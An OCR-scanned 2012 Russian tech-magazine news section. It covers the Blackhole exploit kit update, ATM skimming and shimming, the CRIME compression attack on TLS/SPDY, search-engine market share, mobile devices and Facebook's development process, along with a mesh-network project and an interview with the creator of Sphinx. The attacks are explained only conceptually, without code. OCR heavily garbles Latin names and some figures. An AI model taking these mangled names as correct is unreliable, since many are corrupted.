львиную долю пространства — Юмашев насчитал 81,5% площади для ноутбу- 
ка с разрешением 1280 х 960! То есть полезная информация и непосредствен- 
но результаты поиска ютятся на жалких 18,5% экрана. Мы повторили опыт 
на мониторе с разрешением 1920 х 1080 и получили приблизительно тот же 
печальный результат, которыйты видишь на скриншоте рядом стекстом. Сто- 
ит л и говорить о том, сколько полезного места пожирает реклама на экранах 
смартфонов, нетбуков и прочих мобильных девайсов? 

Но Юмашев также не поленился подсчитать, сколько всего ссылок поль- 
зователь видит в окне и сколько из них действительно являются результа- 
тами поиска. Эти цифры выглядят едва ли не страшнее предыдущих. Из 45 
ссылок только 5 — результаты поиска (если считать с адресами сайтов, то 
соотношение составляет 10 из 57)! 





Стоитсказать — такбыло не всегда. Некогда, в стародавние времена, поисковая выдача боодіе была 
информативна и аскетична — еще в 2007 году, если судить по старым скриншотам, результаты поис- 
ка занимали примерно 50% площади. 



ДО ВЕРСИИ 2.0ОБНОВИЛСЯ ПОПУЛЯРНЫЙ ВЬАСКНОЬЕ ЕХРЮІТ КІТ 



АВТОРЫ УВЕРЯЮТ, ЧТО В НО- 
ВОМ ВІ.АСКНОІ.Е С НУЛЯ ПЕРЕ- 
ПИСАНО ПРАКТИЧЕСКИ ВСЕ, 
ВКЛЮЧАЯ АДМИН-ПАНЕЛЬ 
И ВЫДАЧУ ЭКСПЛОЙТОВ 



ЦЕНТРАЛЬНЫЙ БАНКГОТОВИТСВЕЖИЕ 
РЕКОМЕНДАЦИИ ПО БЕЗОПАСНОСТИ 




еу мол и мая статистика от самых разных иссле- 
довательских компаний гласит — скиммингв 
России процветает и от этого вида мошенниче- 
ства практически незащищены банкоматы множества 
банков. Кпримеру, только в первом кварталетекущего 
года былозафиксировано362случаяустановки скимме- 
ров на банкоматы и уже во втором квартале 2012-го эта 
цифра возросла на 30% ! О способах защиты от этой непри- 
ятной разновидности кардинга говорятмного и давно, 
но«серебряной пули» до сих пор не придумали. Вэтом 
месяце газета «Коммерсантъ» рассказала, чего нам стоит 
ожидать в скором будущем в этой сфере. 

По информации «Ъ», ЦБ сейчас занимается подготов- 
кой новых рекомендаций по защите банкоматов. Речь в 
готовящемся документе, в частности, идетоб оснащении 
банкоматов не только пассивными средствами защиты, 
которые широко применяются уже сегодня, но и актив- 
ными. Что это значит? Предполагается, что банкоматы 
можно оснащать специальными приборами, создающими 
электромагнитное поле, которое не позволит никакому 
другому устройству, кроме самого банкомата, считывать 
данныескарт. Воттакой зсИі. Кактивным защитным 
устройствам ЦБтакже относитдетекторы, определяю- 
щие, что на банкоматустановлен скиммер, и информиру- 
ющие об этом банк. Стоитсказать, что активная защита 
тоже придумана не вчера и в настоящий момент уже 
используется, но лишь на 5% банкоматов, что, конечно, 
ничтожно мало. Оснащение одного банкомата активной 
защитой обходится банкам в 1,5-2тысячи долларов (в 
России ихболее80тысяч). 

Впрочем, даже активная защита не убережет гаран- 
тированно от скиммин га. Эксперты предупреждают, 
что мошенники также могутустановить считывающее 
устройство не на сам банкомат, но, например, на замок, 
пропускающий клиента в отделение по карте в ночное 
время. Возможным выходом изданной ситуации могбы 
статьпереход банков на чипованные карты, однакоэтот 
вариант обойдется банкам значительно дороже, а значит, 
они вряд ли на это пойдут. 

Ну и, конечно, не стоит забывать о том, что ским- 
мин г — не единственная проблема такого рода. Кпримеру, 
в России уже появился достаточно молодой, но уже попу- 
лярный на Западе шимм инг — по сути, это более изящный 
и миниатюризированный способ скиммин га. В отверстие 
банкомата устанавливается сверхтонкая и гибкая плата, 
которая прикрепляется к контактам, считывающим дан- 
ные с карт. Достойных способов борьбы с этой напастью 
пока вообще не придумали. 
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МЕ6АЫЕѴѴ5 



ПЛИМУТСКИЙУНИВЕРСИТЕТ в Великобритании присвоил Евгению Касперскому степеньпочетного доктора. 



ЭКСПЛОЙТ СРІМЕ — 
РАСШИФРОВКАДАННЫХ 
ИЗ И 5РБѴ 



АВТОРЫ ВЕА5Т ПРЕДСТАВИЛ И НОВУЮ РАЗРАБОТКУ 




Авторы эксплойта заранее предупредил и всех производителей браузеров о своей 
разработке, но патчи установлены пока только в последних версиях СЬготе и 
Ріге^ох. 



сследователи Джулиано Риццо и Тхай Дыонг — известные 
личности на современной сцене. В свое время именно они 
разработалитехнику ВЕА5Т, используемую против55І_/ 
ИБ-соеди нений. Новое детище Риццо и Дыонга получило не менее 
звучное название СРІМЕ (Сотргезвіоп Раііо Іпію-Іеак Масіе Еазу) и 
используетсяужедля каналов связи ЕБЬ/ИБ и БРйѴ. При помощи 
нового эксплойта можно расшифроватьтрафикИБ после исполне- 
ния атакующим скрипта в браузере пользователя. Также требуется, 
чтобы использовалосьсжатие передаваемыхданных. В своей рабо- 
те СРІМЕ опирается на функции компрессии заголовков с помощью 
2 ІіЬ и является продолжением идей, ранее воплощенных в ВЕА5Т. 
Вся соль заключена в возможности выделения из зашифрованного 
трафика блоков да иных с метками, отправляемыми подставным 
ЭаѵаБсгірІ; на сайт, для котороготребуется перехватитьсоокіе, в 
рамках общего шифрованного канала связи. Дело в том, что да иные 
сжимаются на этапе до шифрования и не подвергаются дополни- 
тельной рандомизации. Определить, где в зашифрованном файле 
находятся соокіез, можно, исходя из того, что в этом месте 2 ІіЬ лучше 
сожмет трафик, ссылаясь на предыдущий блок. Защитить свой 
сервакоттакой «радости» можно, просто отключив сжатие ББЕ/ИБ. 
Тоже самое касается и браузеров, для которых пока нет патчей. 



ПАРАДОКС: «ЯНДЕКС» 
ОБОГНАЛ бООбДЕ 

ЭКСПЕРТЫ НЕ ПОНИМАЮТ, КАК «ЯНДЕКС» СУМЕЛ ОБСТАВИТЬ 
600СІ.Е НА ИХЖЕ ПОЛЕ. КТО СКАЗАЛ «ЗАЩИТНИК»? 

транную новость принесла опубликованная в этом месяце 
статистика Ыѵеіпіегпеіза июль2012 года. Оказывается, 
в браузере СИ готе по поисковому трафику в России лиди- 
рует совсем не Ооодіе, как можно было бы подумать, а, внезапно, 
компания «Яндекс» — 44,5% против43,2%. 

Каким образом «Яндексу» этоудалось, доподлинно неизвестно. 
Но стоитсказать, что результат вдвойнеудивителен, если помнить 
о том, что с августа 2011 года Боодіе запретила для пользовате- 
лей ряда стран (включая Россию) выбор поисковика при первой 
загрузке браузера. В СИ готе по умолчанию используется именно 
собственный поиск Боодіе. Нет, разумеется, возможность выбора 
поисковика, который пользователь хочет юзать по умолчанию, 
осталась где-то в недрах настроек «Хрома», но туда доберется 
далеко не каждый. 

Теперь эксперты уверены, что у «Яндекса» появился некий 
канал продвижения в браузере, но какой именно — сказать не 
могут. Нам кажется, чтоэксперты немного лукавятили нехотят 
озвучивать очевидное — дел о явно не обошлось без многочис- 
ленных и крайне навязчивых тулбаров от «Яндекса». У Боодіе свой 
тулбар, конечно, тоже есть, но только для ІЕ и эффект от него в 
России довольно слабый. Ведь практически весь бесплатный софт, 
популярный в нашей стране, предлагает заодно с собой установить 
и «Яндекс. бар». Притом в число партнеров «Яндекса» входяттакие 
популярные инструменты, какиТоггепІ, Баеппоп Тооіз и так далее. 
Плюс, пожалуй, не стоит забывать и о том, что у многих пользовате- 
лей Рунета «Яндекс» попросту назначен домашней страницей. 







КОМПАНИЯ ЕІИКПРОДЕМОН- 
СТРИРОВАЛАИНТЕРЕСНЫЙ 
ПРОТОТИП СМАРТФОНАС 
ДВУМЯ ЭКРАНАМИ на вы- 
ставке ІРА 2012: с одной сто- 
роны расположился обычный 
дисплей, а с обратной сторо- 
ны устройства— вспомога- 
тельный е-іпк-дисплей для 
чтения иэкстренных случа- 
ев. Отличная идея, надеемся, 
она доберется до прилавков 
магазинов и не останется 
прототипом навечно. 




НА ФИЛИППИНАХ ЗАПРЕТИ- 
ЛИ КИБЕРСЕКС в результате 
принятия закона о предот- 
вращении киберпреступ- 
ности, запретившего также 
прослушку и киберсквот- 
тинг. 




ІРѴ4 ДЕЙСТВИТЕЛЬНО ЗА- 
КАНЧИВАЕТСЯ. Последний 
блок ІР-адресов из адрес- 
ного пространства ІРѵ4/8 
в Европе был распределен 
в конце сентября, сообщил 
РІРЕ N00. 
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КІСК5ТАКТЕК ОБЪЯВИЛА ВОЙНУ ФАНТАЗЕРАМ. В заявках больше не допускаются рендеры устройств— только реальные прототипы. 



МОБИЛЬНЫЕ НОВИНКИ ОСЕНИ 

КРУПНЫЕ АНОНСЫ ВЕДУЩИХ ПРОИЗВОДИТЕЛЕЙ 

е только компания Арріе презентовала этой осенью свои 
новинки. Другие производители, похоже, подстроились 
под цикл «яблочного» гиганта, и в стане Ап сігоісі тоже 
произошло несколько примечательных событий, которые заслу- 
живают внимания. 

Компания Атагоп обновила свои КіпсІІе, и это касается не 
только ридеров набазее-іпк, ной планшетов, на которых мы 
остановимся подробнее. 

Первый КіпсІІе Ріге оказался очень популярным благодаря низ- 
кой цене и высокому качеству. На смену ему пришли сразу три но- 
вых планшета на базе мод ифи ци ро ванной АпсІгоісІ 4.0. Основной 
КіпсІІе Ріге носит прежнее название, но получил ускоренный на 
40% процессор, вдвое больше оперативной памяти (1 Гб) и аккуму- 
лятор помощнее. Цена планшета по-прежнему остается низкой — 
всего 159 долларов. Второй планшетуже является неапгрейдом 
существующей модели, но совершенно новым девай сом. КіпсІІе 
Ріге РШ выходит в двух версиях: с 7- и 8,9-дюймовым экраном 
(разрешение 1280x800 и 1920х 1200 соответственно). Интересно, 
что покрытие у дисплеев антибликовое. Планшет работает на 
процессоре ОМАР 4.470 отТехаз Іпзігитепіз, который, поданным 
Атагоп, легко оставляет позади Тед га 3, а объем его оперативной 
памяти составляет 1 Гб. Есть РШ -камера, РШМІ -выход, ВІиеІооіЬ 
и другие радости жизни. Ріо у новинки будет и еще одна разновид- 
ность: КіпсІІе Ріге РШ НЕ. Как нетрудно догадаться, эта версия 
оснащена мощной двойной антенной для сотовых сетей и не 
мен ее мощным ѴѴі-Рі-приемни ком. Компания обещает прирост 
в скорости загрузки контента на 40%. Эта «игрушка» выступает 
флагманом всей серии и обойдется уже недешево — придется вы- 
ложить 499 долларов. 

Главный конкурент Атагоп — ВагпзапсІ ІМоЫетоже недрем- 
лет. Не прошло и пары недель, как компания, вслед за Атагоп, 






Моіогоіа, НТС и Ютакжеанонсировали новые продукты, притом Моіогоіа 
представила смартфон ГСА2К і на базе платформы АпсІгоісІ 4.0 и чипа Іпіеі 
Аіот с тактовой частотой 2,0 ГГц. Это первый плод альянса Моіогоіа — 
Іпіеі, который компания считает очень важным. В очередной раз жаль, 
что Моіогоіа официально не представала на российском рынке. 



презентовала обновленные планшеты. Цена на устройства серии 
N00 К осталась на прежнем уровне, авот начинка значительно 
изменилась. Младшая, наиболее популярная модель N00 К ЕШ с 
7-дюймовым экраном получила двухъядерный процессор ТІ ОМАР 
4470 с частотой 1,3 ГГц, 1 Гбоперативки,а также 8 или 16 Гб встро- 
енной памяти. Нужно сказать, что в тесте ОЬ ВепсЬтагк планшет 
показал 60 кадров в секунду, что в два раза больше, чему КіпсІІе 
ЕігеН^.ЦенанаN00КН^с8Гб памяти составила 200, с 16 Гб — 
230 долларов. 

А между компаниями Ооодіе и Асегтем временем разгорелся 
конфликт. Поисковый гигант пригрозил тайваньской компа- 
нии прекращением всяческого взаимодействия по платформе 
АпсІгоісІ, в том числе и отказом в технической помощи, в случае 
если Асег не откажется от выпуска смартфона Асег СІоисІ МоЬіІе 
А800. Что не так с этим аппаратом? Он должен был базироваться 
на платформе АІіуип, разработанной китайской фирмой АІіЬаЬа 
СІоисІ Сотриііпд. Данная ОС основана на ядре Ьіп их, и АІіЬаЬа 
анонсировала ее еще летом 2011 года. На АІіуип 05 уже вышел ряд 
устройств от китайских компаний ("Папу и и Наіег). В Асег угрозу 
Ооодіе, судя по всему, восприняли серьезно — компания отменила 
презентацию устройства без каких-либо объяснений. Официаль- 
ных комментариев от обеих сторон до сих пор не последовало. 



Ви22АК0ШПИ0НИТЗАП0ЛЬ30ВАТЕЛЯМИ 



В СКРИНШОТАХ 
ѴѴОКІ.ООРѴѴАКСКАРТ 
НАШЛИ СКРЫТЫЕ 
ВОДЯНЫЕ ЗНАКИ, 
СОДЕРЖАЩИЕ ДАН- 
НЫЕ О ІІ5ЕР ІО, ТІМЕ И 
ВЕДЬМ В ВИДЕ А5СІІ 
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НЕДОЕВ 




КОЛОНКА 
СТЁПЫ ИЛЬИНА 



ДЕСАНТ 

РАСЕВООК'А В МОСКВЕ 



МАРК, ПРИХОДИ 

Марк Цукерберг, по духу истинный хакер 
(в самом хорошем смысле этого слова), мог бы 
стать отличным героем нашего интервью. Увы, 
уловить его хотя бы на полчасика для разговора 
не удалось — ничего, получится в следующий 
раз. Зато с Марком в Москву высадился целый 
десант сотрудников РасеЬоок 'а, включая самую 
интересную для нас категорию людей — раз- 
работчиков. Жизнерадостные парни, сияющие 
от причастности к разработке сервиса, который 
в буквальном смысле меняет мир, супоением 
рассказывали много интересных вещей. Девело- 
перы мобильных приложений и приложений 
для социальных сетей наверняка почерпнули 
для себя, какувеличить свою аудитории, если 
использовать все возможности технологии Ореп 
бгарЬ. К слову, в последней версии Ю5 Арріе 
встроил интеграцию с РасеЬоок'ом из коробки. 

Но что было интереснее всего мне — так это 
доклад о том, как к разработке подходят внутри 
самого РасеЬоок'а. Как создается самая большая 
социальная сеть? Я вынес для себя пять инте- 
ресных моментов. 



5 ПОДХОДОВ К РАЗРАБОТКЕ 

1. Путь от за вершения разработки фичи до 
ее развертывания для миллиарда пользо- 
вателей занимает не более девяти дней! 

При этом код деплоится на боевые серверы 
непрерывно, каждый день. Самый большой 
ком мит (применение изменений в коде) — по 
вторникам. Самый осторожный, чтобы не 
напортачить перед выходными, — в пятницу. 

2. Любые изменения — пусть даже самые 
микроскопические и незначительные — 
обязательно проходят процесс собе геѵіеѵѵ. 
Другим словами, любые изменения на 
разныхэтапах просматриваются кем-то 
еще на правильность и адекватность. 
Чтобы упростить процесс взаимодействия 
и упростить то же самое обсуждение из- 
менений в коде, было разработано специ- 
альное решение — тулкит РЬаЬгісаІог. Он 
состоит из четырех частей. Самый главный 



модуль — ОіНегепІіаІ — предназначен как 
раз для организации процесса собе геѵіеѵѵ. 
Второй модуль — МапірЬезІ — представ- 
ляет собой продвинутый таек- менеджер. 
Модуль Негаібу отправляет у ведом лен ия 
об изменениях в коде. С его помощью мож- 
но, к примеру, сказать: «Если в этом куске 
кода что-то изменится, дайте знать» — и 
таким образом быть уверенным, что никто 
не напортачитвтом коде, за которыйты 
несешь ответственность. Наконец, модуль 
ОіЛшзіоп представляет собой продвинутый 
собе-браузер, который в наглядной форме 
покажет историю изменений. Тулкит 
по-настоящему полезен — это подтверж- 
дается тем, что на вооружение его берут 
все больше и больше сервисов, включая, 
например, йгорЬох. Кслову, РасеЬоокот- 
крыл исходники тулкита ( рЬаЬгісаіог.огд ). 
как и для многих других своих внутренних 
разработок. 

4. В РасеЬоок'енепризнаютпонятия^еаІиге 
ЬгипсЬ — когда для разработки новой фичи 
создается отдельная, независимая ветка 
кода. Почему? Потому что это порождает 
проблемы во взаимодействии, пока фича 
небудетзарелизена. Какое решение нашли 
в РасеЬоок'е? Программист пишет код, 
далее этот код попадает в так называемый 
ЗаІеКеерег — и уже с помощью этого ин- 
струмента можно легко выбиратьереду, для 
которой будутприменены изменения в коде. 




Можно применить их для себя — програм- 
миствэтом случае оценит все свои правки 
на реальном продукте — РасеЬоок'е, откры- 
том на десктопе или мобильном телефоне. 
Или, кпримеру, разрабатываемую фичу 
можно расшарить для команды, состоящей 
из группы программистов. Затем пойти 
дальше и сделать небольшой ІаипсЬ для ча- 
сти пользователем, причем с продвинутым 
таргетингом (например, для 10% юзеров из 
России). 

5. Большинство новых фич тестируются на 
сотрудниках (им всегда доступна самая 
последняя версия РасеЬоок'а), которые 
становятся первыми тестерами. Приэтом 
в компании сделали все, чтобы каждый мог 
максимально просто и быстро отправить 
багрепорт. Прямо в интерфейсе социальной 
сети естьэлементы, которые недоступны 
обычным смертным. Можно быстро от- 
править багрепорт, назначить задание для 
инженеров (которое отобразится втомже 
самом РЬаЬгісаІог), приложитьскриншот, 
увидеть список недавно отп равлен ных ба- 
гов итакдалее. В результате от однихтолько 
сотрудников РасеЬоок'уудается получить 
колоссальный фидбек — причем не только 
с описанием багов, но и с качественной 
оценкой новыхфич. 

Разумные подходы и правильные инструменты. 

Попробую использовать на практике. И-И 
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Анатолий Ализар (аіігагйдтаіі.сот) 
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РгооРоРСопсерІ: 

ВѴ2АЫТШМ иГШХ: 

ИНТЕРНЕТ БЕЗ ПРОВАЙДЕРА 



ЗАЧЕМ ЭТО НУЖНО 

Мы ведь не хотим потерять связь в случае ядерной войны, верно? 
Увы, современный интернет не так надежен, как кажется. Топо- 
логия Сети на самом деле лишь частично ячеистая, а во многом 
основана на иерархической парадигме. Другими словами, выходит 
из строя несколько узлов обмена трафиком — и вашему сегменту 
интернета приходит каюк. На случай природного катаклизма, 
техногенной катастрофы, аварии в системе электроснабжения или 
другого бедствия (авторы проекта Вугапіішті упоминают зомби- 
апокалипсис) нужно обеспечить резервный вариант. Нужна некая 
рабочая сеть между пользователями, без посредничества провай- 
дера. Вместо иерархической структуры нужно создать истинную 
ячеистую топологию, которая поддерживает множество альтерна- 
тивных маршрутов между узлами. 

КАК ЭТО РАБОТАЕТ 

Проект Вугапіішті предусматривает создание ячеистой сети (пгіезЬ 
пеіѵѵогк) на протоколе 802.11 в качестве бэкапа для традиционного 
иерархического интернета. Проект отличается использованием 
дешевого оборудования, максимально быстрым развертыванием 
сети, надежностью, расширяемостью, безопасностью и дешевиз- 
ной в обслуживании. 

Авторы идеи из хакерской группы НасйС ( Ьасск.огд ) предлага- 
ют использовать для 051 Іауег 2 протокол 802.11, где возможность 
пиринга предусмотрена стандартом. Практически каждое ѴѴі-Рі- 
устройство может переключиться в пиринговый режим. Для 051 
Іауег 3 (маршрутизация) существует около 70 протоколов с различ- 



Рис. 1. Массовое отключение пользователей Рис. 2. Отключение провайдера или 
из-за стихийного бедствия, отключения умышленное вмешательство на уровне 

электричества магистральных каналов 



ным функционалом: см. ЫЫу/5На5Ва . Авторы предлагают исполь- 
зовать Ореп 802.1 1 з, который поддерживается на уровне ядра опе- 
рационных систем Ыпих и РгееВ5й, а также 0І_5Р (Оріітігесі Ыпк 
51а1е Роиііпд), ВАТМАІМ-АсІѵапсесІ (ВеНег АрргоасЬ То МоЬіІе Аб-Ьос 
ІМеІѵѵогкіпд) и ВаЬеІ. Эти низкоуровневые протоколы обеспечивают 
необходимую надежность, безопасность и расширяемость сети. 

КАК ИСПОЛЬЗОВАТЬ 

Это самое интересное. Система работает практически на любых 
ѴѴі-Рі-маршрутизаторах и не требует их аппаратной или программ- 
ной модификации. Достаточно лишь загрузить операционную 
систему с соответствующим стеком протоколов. Для демонстрации 
проекта разработчики выпустили дистрибутив Вугапііит Ыпих 
ѵ0.2а со всеми необходимыми настройками ( рго]есМэу 2 ап 1 шпп.огд/ 
боѵѵпіоаб ). Весит 150-файл около 460 Мб. 

Очевидно, каждый пользователь должен записать ЫѵеСО 
и при наступлении апокалипсиса быстро загрузить эту систему. 

А до тех пор ЫѵеСО пусть висит на стенке с напоминанием о воз- 
можной смерти нашего мира. Как говорится, тетепіо тогі. 

Резервный вариант для связи с миром может пригодиться 
не только если разразится катастрофа (рис. 1), но и в случае 
централизованной блокировки магистральных каналов (рис. 2), 
введения государственной цензуры и глубокой инспекции пакетов 
с фильтрацией трафика определенного типа (например, 55І_). 

Это так называемый египетский вариант, который возможен 
в любой стране мира: в странах с «неразвитой демократией» могут 
быть политические причины для введения инспекции трафика, 
а на Западе власти могут начать крестовый поход против интер- 
нет-пиратства. Причины разные, но пользователи будут страдать 
в любом случае. Поэтому неудивительно, что появляется все боль- 
ше проектов ячеистых сетей для альтернативного способа связи 
между пользователями по принципу Р2Р. 

С помощью Вугапіішті Ыпих развернуть в стране «резервный 
интернет» способна небольшая группа активистов с минимальной 
технической квалификацией. Они должны раздавать людям за- 
ранее подготовленные диски Вугапіішті Ыпих ЫѵеСО. 

Проект в альфа-версии, поэтому разработчики убедительно 
просят пока не использовать его в критичных для жизни ситу- 
ациях, а лучше проверять и исправлять код: Шрз://дЩіиЬ.сот/ 
ВѵгапІіит/Вѵгапііипп/іззиез . ЗС 
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С0ѴЕК5Т0КѴ 



Беседовал Степан Ильин 



ГЛАВНАЯ 

ЗАГАДКА 

5РНІЫХ 



АНДРЕЙ 

АКСЕНОВ 

СОЗДАТЕЛЬ ПОИСКОВОГО 
ДВИЖКА5РНІИХ 



Хабрахабр, ТИе Рігаіе Вау, АѴІТО.ги, Сгаідзіізі, 
ТитЫг, Оаііутоііоп — что у них общего? Оказыва- 
ется, все они используют один и тот же поисковый 
движок — ЗрЫпх. Этот продукт с исходным кодом 
разрабатывается командой талантливых ребят из 
разных городов и стран, однако началось все в 
городе Воронеже. Как устроен поиск и чем замеча- 
тельны песни йересИе Мобе, как зарабатывать на 
бесплатном продукте и как работать с людьми, не 
видя их лиц, — обо всем этом читателям ][ расска- 
жет создатель БрЫпх Андрей Аксенов. 



ПЕСНИ В ТЮРЬМЕ ЕРЕЕВ5Й 



300 миллионов поисковых запросов в 
сутки — ровно столько обращений к поиску 
приходится выдерживать ЗрЫпх'у на крупней- 
шем в США ресурсе бесплатных объявлений 
СгаідзІізЕ Это самый большой известный нам 
пример использования нашего движка по 
количеству обрабатываемых запросов. 

Из искры разгорелось что-то. Впрочем, 
как обычно — жизнь всегда большая череда 
случайностей. У меня был никому не интерес- 
ный сайтик с коллекцией из 130 тысяч текстов 
песен, на котором не было поиска. Последний 
факт особенно возмущал, потому что когда 
по радио ты слышал какую-то песню, то улав- 
ливал пару-тройку слов, которые разбирал с 
пятнадцатого прослушивания, — но поискать 
по этим словам текст песни не было возмож- 
ности. Я посмотрел, какие годные решения 
существуют для этого, — на тот момент таких 
не оказалось. 

Передо мной стояли жесткие ограниче- 
ния по железу. Сайт подпольным образом 
хостился у местного провайдера, в жестко 
ограниченном виртуальном частном сервере 
ЦаіІ в терминологии РгееВЗО). В 128 Мб памяти 
и 200-300 Мб на диске нужно было уместить и 
базу, и поиск, и фронтенд, и все прочее. 

Я попробовал использовать для этого 
тпобоБеагсІі — один из древнейших движков, 
написанных на С++. Он изначально предназна- 
чался для индексации веб-страниц, и механизм 
индексации базы у него был (в те годы) крайне 
дурацкий. Он делал кучу лишних запросов к 
базе и зверски тормозил на одном только этом. 
Плюс формат индекса на тот момент был просто 
адский. Индексировать базу было практически 
невозможно. Сто мегабайт индексировалось 
24 часа — это же курам на смех! 

Выхода не было, и я принялся хардкор- 
но патчить тпобоБеагсІі. Оптимизировал 
использование диска временными файлами, 
оптимизировал выборку данных из базы. 

В конце концов пришел к такому состоя- 
нию, что «патчу» больше не нужен и сам 
тпоОоЗеагсЬ :). 

Было важное требование: все должно 
было помещаться в определенные жесткие 
лимиты. То есть делаем вид, что мы — жут- 
кие сопігоі ітеакз, контролируем вообще все. 
Прогнозируем, сколько памяти сожрем. Если 
сказано, что буфер памяти под индексацию 
должен быть восемь мегабайт, то ровно во- 
семь мегабайт и должно быть — и мы из кожи 
вылезем, чтобы не использовать больше. По- 
нятно, что все это пришлось оптимизировать, 
чтобы втиснуться в лимиты, обусловленные 
физически — железом. 

Еще один ключевой момент — с ранжи- 
рованием тоже нужно было что-то делать. 
Ведь все песни состоят примерно из одинако- 
вых семи слов — я, ты, он, она, вместе целая 
страна, я люблю тебя, ты люби меня. Плюс 
предлоги в разнообразных комбинациях. 
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5РНІЫХ 



Первый компьютер — 
Искра 1030 

Первый язык программи- 
рования— Вазіс 
Первую популярную про- 
грамму написал в 14 лет 
наассемблере 
Окончил ПМ в Липецком 
государственном техниче- 
скомуниверситете 
В прошлом веб- 
разработчик, системный 
программист и успешный 
датесіеѵеіорег 
Частый гостьна различных 
российскихи международ- 
ных конференциях 



Скорость индексации — 
до 10-1 5 Мб/с на ядро 
Скоростьпоиска — 
до200-400запросов 
в секунду на каждое ядро с 
1 миллионадокументов 
Масштабируемость — 
боевыевнедрениядо 
300 миллионов запросов 
в сутки, до 40 миллиардов 
документов 
Конкуренты — Боіг/ 
І_исепе, ЕІазІісБеагсІі 









С0ѴЕК5Т0КѴ 



Мой любимый пример из той эпохи — на- 
звание песни йересЬе Мосіе «I ТееІ уои». Про- 
сто классика. Каждое из этих слов встречается 
более чем в половине всей коллекции песен. 

За счет этого стандартный статистический ал- 
горитм ранжирования такую песню, в которой 
есть точная цитата — идеальное соответствие 
поисковой фразе, но повторяется она нечасто, 
заранжирует глубоко вниз. То есть идеальное 
соответствие запросу окажется на самом дне 
выдачи. Зато песня, в которой все три слова 
повторяются оч-ченьуж много раз, окажется 
на самом верху. 

Еще одно ключевое дизайн-решение 
заключалось в том, что близкие совпадения 
фраз нужно вытягивать вверх. Ранжировать 
выше, чем просто россыпь слов по документу. 
Это подсказал простой здравый смысл, когда я 
решал свои личные задачи. Я хотел, чтобы точ- 
ная цитата из песни была вверху, и была там 
гарантированно. Стандартный, статистический 
метод ранжирования мне этого не давал — он 
смотрел только на частоты, но не смотрел на 
позиции слов. 

Так появился новый поиск, который... не- 
сколько лет пролежал в столе. Я использовал 
его для личных целей, раздавал друзьям и зна- 
комым, по их запросам вносил какие-то правки. 

Один из таких пользователей оказался 
очень активным молодым человеком. Его зовут 
Петр Зайцев, он хорошо известен в узких кругах 
как основатель компании Регсопа, но в тот 
момент еще работал в Му5С|1_. Он фактически за- 
ставил меня выйти из тени, сделать сайт, начать 
светиться на конференциях. В общем, рассказал 
мне о том, что проект по большому счету вышел 
годный, людям нужный, и практически принудил 
меня его выложить. За что ему большое спасибо, 
он сыграл немалую роль. 

Благодаря ему я начал пилить 5рЫпх для 
проектов большего масштаба. Тут важно по- 
нимать: одно дело, когда индексируешь сто 
мегабайт на личном сайте или полгигабайта 
сообщений форума на «Тупичке» ( орег.ги ). 

И совсем другой вопрос, когда тебе запилива- 
ют 50 Гб в 50 миллионах сообщений из блогов, 
которые откуда-то накраулили. 

Десять лет назад 99% поисковиков были 
написаны исходя из следующего предпо- 
ложения: клиент хочет купить готовый набор 
скриптов, которые позволяли бы прицепить 
поиск на свой сайт. И чтобы робот дальше сде- 
лал за него все — обошел сайт, все документы 
выкачал, сложил в полнотекстовый индекс. 

БрЫпх не про это. Он не будет за тебя 
ходить по сайтам, он чисто про поиск. Предпо- 



лагается, что данные у тебя уже есть, и откуда 
ты их взял — из базы данных или откуда-то 
еще, — уже не важно. Может быть, ты за меня 
сходил по интернету и накачал документы. 
Зато я умею их проиндексировать и быстро по 
ним искать. 

С масштабированием тоже полный по- 
рядок. У нас есть две части: часть, которую я 
все еще считаю простой, и часть, которая куда 
сложнее. Когда нужно разложить данные на 
много серверов, возникают две проблемы. Как 
разложить и потом собрать их вместе? 

Разложить — в нашей модели проблем нет. 
На один сервер положил конфигурацию, на 
которой написано «этот сервер тянет докумен- 
ты с номерами от 1 до 1 000 000». На второй 
сервер положил конфигурацию от 1 000 000 
до 2 000 000. Все, задача индексации решена. 
Конечно, у тебя возникает зоопарк конфигов 
на разных серверах — их возможно как-то 
автоматизировать или положить под контроль 
версий... но это понятные и легкие техни- 
ческие трудности. А вот если бы поисковая 
система понятия не имела о слиянии резуль- 
татов поиска, тебе пришлось бы в приложе- 
нии писать массу идиотского кода: а давайте 
сходим ко всем серверам, соберем с каждого 
отклик, вместе их сольем, пересортируем по 
нужному условию сортировки... Из десяти сер- 
веров два не ответили? Давайте сходим опять. 
Естественно, это сделано в ЗрЫпх, ведь мы 
должны помогать пользователю делать поиск, 
а не головную боль ему создавать. В какой-то 
момент это было хорошим отличием ЗрЫпх от 
«врагов» типа АрасЬе 5оІг (он тогда вообще не 
распределялся на несколько серверов). 



КАК УСТРОЕН ПОИСК? 



Последние несколько лекций на эту тему 
я начинал со слов: «Кто читал Библию, тот 
умеет делать поиск». Есть такая штука в 
массе разных изданий Библии, называется 
конкорданс: в самом конце для каждого сло- 
ва, за исключением предлогов и междометий, 
написано как минимум, на какой странице оно 
находится, а как максимум — дана и более 
точная позиционная информация (например, 
в каком стихе встречается). Это отличная 
ментальная модель поискового индекса. Он 
именно так и устроен. 

Приведу пример: берем текст и строим 
так называемый инвертированный индекс. 
Что это такое? Это большой сортированный 
по алфавиту словарь, где для каждого слова 
прописан список документов, в которых оно 
встречается. Можно реализовать его даже 



вручную в МісгозоЙ ѴѴогсІ! После этого мы 
достаточно быстро сумеем бинарным поиском 
найти нужное слово, прочитать эту строчку, 
где через запятую записан список номеров 
документов, и вот — мы их нашли. Это и есть 
модель примитивного полнотекстового поиска. 

Однако нужно хранить не только номера 
документов, но еще и позиции слов в них. По- 
зицию при этом можно записывать по-разному. 
То есть это может быть не просто номер слова 
от начала документа, но также номер поля, 
номер зоны. Для веб-поиска возможны еще 
атрибуты: скажем, не подкрашено ли слово 
жирным шрифтом или красным цветом. В слу- 
чае с языками с развитой морфологией (типа 
русского) может оказаться неплохой идеей 
также указать и форму слова. 

Потом возникает и чисто технический 
вопрос — не будешь же ты, в самом деле, 
вордовый документ читать? Данные нужно 
сохранить бинарно, хорошо пожать, чтобы они 
жрали поменьше места, а поиск работал бы- 
стрее. Получается вот такая структура данных. 

Есть также два принципиально конфлик- 
тующих параметра: скорость и качество. Тре- 
бование «нужно максимально быстро отдать 
результат» — это одно. А качество поиска — 
это уже другое требование. Качество поис- 
ка — это штука, которой серьезно на данный 
момент занимаются только веб-поисковики. 
Соодіе, Ѵапбех и так далее. Нам, конечно, тоже 
хочется этим заниматься, но силенок пока не 
очень хватает. 

Что нужно, чтобы сделать мегаскорость? 

Грубо говоря — максимально ловко пожать 
список документов, так чтобы можно было 
максимально быстро его разжать, прочи- 
тать и выплюнуть в программу. Все. Это одно 
